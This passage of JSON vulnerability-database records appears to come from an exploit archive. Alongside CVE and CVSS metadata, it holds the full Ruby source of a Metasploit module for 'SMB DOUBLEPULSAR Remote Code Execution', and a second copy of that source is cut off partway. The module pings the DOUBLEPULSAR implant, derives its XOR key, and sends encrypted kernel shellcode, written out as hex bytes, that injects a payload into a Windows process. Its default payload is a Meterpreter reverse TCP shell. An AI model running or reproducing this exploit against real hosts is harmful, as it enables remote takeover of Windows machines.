"nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-23T22:13:27", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-23T22:13:27", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-24] #"}, "lastseen": "2021-10-23T22:13:27", "differentElements": ["sourceData"], "edition": 53}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "bca16d35f701200b292213bc972d72e9", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-25T00:15:24", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": 
"zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-25T00:15:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-25T00:15:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
